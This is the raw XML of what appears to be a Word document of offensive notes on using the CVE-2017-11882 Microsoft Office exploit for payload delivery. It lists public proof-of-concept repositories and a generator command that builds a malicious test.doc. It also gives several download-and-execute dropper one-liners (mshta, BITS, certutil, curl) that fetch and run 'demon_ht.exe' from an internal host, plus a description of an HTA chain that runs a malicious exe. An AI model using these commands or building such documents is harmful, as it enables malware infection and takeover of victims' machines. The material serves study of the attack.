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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using CVE 2017-11882 exploit for payload delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding poc for 11882 in the wild</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Unamer’s implementation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/unamer/CVE-2017-11882" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/unamer/CVE-2017-11882</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This implementation used to work before however the poc did not work in the latest Windows 10 1909 while testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Starnightcyber implementation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/starnightcyber/CVE-2017-11882" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/starnightcyber/CVE-2017-11882</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This implementation was foundto work with the latest Word. However only 43 byte payload size is available for this poc which limits the scope of deliver mechanism.</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It has a straight forward python program to use</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FFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 Command_CVE-2017-11882.py -c "curl -O http://10.10.6.156:9/a.exe &amp; .\a" -o test.doc </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Other repos worth mentioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/embedi/CVE-2017-11882</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/Ridter/CVE-2017-11882</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bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Various ways to drop a malicious exe that were tested</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mshta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://10.10.6.56:8000/abc`" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://10.10.6.56:8000/abc`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell -command Start-BitsTransfer http://10.10.6.56:8000/demon_ht.exe demon_ht.exe;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certutil.exe -urlcache -split -f http://10.10.6.56:8000/demon_ht.exe %TEMP%\\demon_ht.exe &amp; %TEMP%\\demon_ht.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl -s http://10.10.6.56:8000/demon_ht.exe | start demon.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</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bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload delivery mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="singl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Starnightcyber’s implementation was supposed to work on following word versions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Office 365</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2003</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2007 Service Pack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2010 Service Pack 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2013 Service Pack 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Office 2016</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simple poc:</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starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc</w:t>
      </w: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 Done ! output file &gt;&gt; test.doc &lt;&lt;</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&lt;insert picture for simple calc here&gt;</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for download and execute we used multiple droppers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11882 calls an mshta which loads an html page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="monospace" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="262335"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>mshta http://10.10.6.156:8000/test.html</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inside the html page we have a vba script which further downloads and runs our malicious exe.</w:t>
      </w:r>
    </w:p>
